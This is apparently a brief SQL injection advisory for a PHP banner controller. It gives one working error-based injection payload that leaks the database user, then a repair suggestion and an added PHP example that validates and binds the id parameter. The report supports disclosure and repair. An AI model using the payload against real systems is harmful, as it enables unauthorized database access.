\App\Manage\Controller\BannerController.class.php
Find where the file was uploaded
Use Burp Suite to intercept requests, modify packets, and add payloads
Vulnerability analysis
PoC:
5) AND (SELECT 5824 FROM(SELECT COUNT(*),CONCAT('[+]',(MID((IFNULL(CAST(user() AS NCHAR),0x20)),1,54)),'[+]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (3481=3481
Source:
Debugging process:
Repair suggestion
Before executing the save() function, filter the id.
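
The repair suggestion above, sketched as an added example that is not code from the report or from the affected project: the id is accepted only as a plain positive integer, then bound as an integer parameter rather than concatenated into the statement. The function names, the `banner` table and the sample inputs are assumptions made for illustration, and the parameter binding goes one step beyond the filtering the report asks for.

```php
<?php
// Added example: hypothetical names throughout, not code from the affected project.

// Accept only a plain positive decimal integer; anything else yields null.
function parse_record_id($raw): ?int
{
    if (!is_string($raw) && !is_int($raw)) {
        return null;                       // e.g. id[]=... arrives as an array
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Stand-in for the controller's update path: validate first, then bind the id
// as an integer parameter instead of concatenating it into the SQL text.
function update_banner(PDO $db, $rawId, string $title): bool
{
    $id = parse_record_id($rawId);
    if ($id === null) {
        return false;                      // rejected before any SQL is built
    }
    $stmt = $db->prepare('UPDATE banner SET title = :title WHERE id = :id');
    $stmt->bindValue(':title', $title, PDO::PARAM_STR);
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount() === 1;
}

// Constructed demo data in an in-memory SQLite database (requires pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE banner (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO banner (id, title) VALUES (5, 'old')");

// Constructed inputs: a valid id, then values that are not plain integers,
// including a fragment shaped like the start and end of the report's payload.
$inputs = ['5', '5) AND (3481=3481', '5 OR 1=1', ['5'], '', '-1'];
foreach ($inputs as $raw) {
    $ok = update_banner($db, $raw, 'new');
    printf("%-24s => %s\n", json_encode($raw), $ok ? 'updated' : 'rejected');
}
```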